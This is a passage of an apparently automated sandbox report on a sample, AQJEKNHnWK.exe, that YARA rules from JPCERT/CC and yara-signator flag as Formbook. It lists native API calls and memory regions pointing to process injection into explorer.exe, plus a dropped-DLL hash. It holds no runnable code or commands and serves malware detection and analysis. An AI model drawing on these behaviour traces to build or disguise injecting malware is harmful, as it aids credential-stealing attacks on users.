          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AAB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AAA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AAAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9560 NtWriteFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AAA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AAA770 NtOpenThread,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_004182EA NtClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0497AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0497A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0497A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0497B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0497A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F8270 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F82F0 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F82EA NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0040102C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041B881
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041C10F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041A2A6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041BC41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00408C5C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00408C60
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041CEF6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B320A8
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B090
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B328EC
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3E824
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21002
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6F900
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B322AE
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9EBB0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2DBD2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B203DA
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B32B28
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7841F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2D466
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7D5E0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B325DD
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A60D20
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B32D07
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B31D55
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B32EF7
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A86E30
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2D616
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B31FF1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3DFCE
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0040102C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041B881
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041C10F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041A2A6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041BC41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00408C5C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00408C60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FD466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A025DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A02D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04930D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A01D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A02EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FD616
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04956E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A01FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A020A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A028EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A022AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FDBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A02B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FA2A6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004E8C5C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004E8C60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004E2D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FCEF6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004E2FB0
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll 6C4628D2A5D9FE67953D21A7AB0FF49BAC94B69FB32B5A1FA94AE8CB71A4D693
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0493B150 appears 35 times
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: String function: 00419F70 appears 34 times
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: String function: 0041A0A0 appears 50 times
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: String function: 00A6B150 appears 35 times
          Source: AQJEKNHnWK.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: AQJEKNHnWK.exe, 00000000.00000003.207038845.000000001F036000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AQJEKNHnWK.exe
          Source: AQJEKNHnWK.exe, 00000001.00000002.256332303.0000000000B5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AQJEKNHnWK.exe
          Source: AQJEKNHnWK.exe, 00000001.00000002.257477540.0000000002A0E000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs AQJEKNHnWK.exe
          Source: AQJEKNHnWK.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
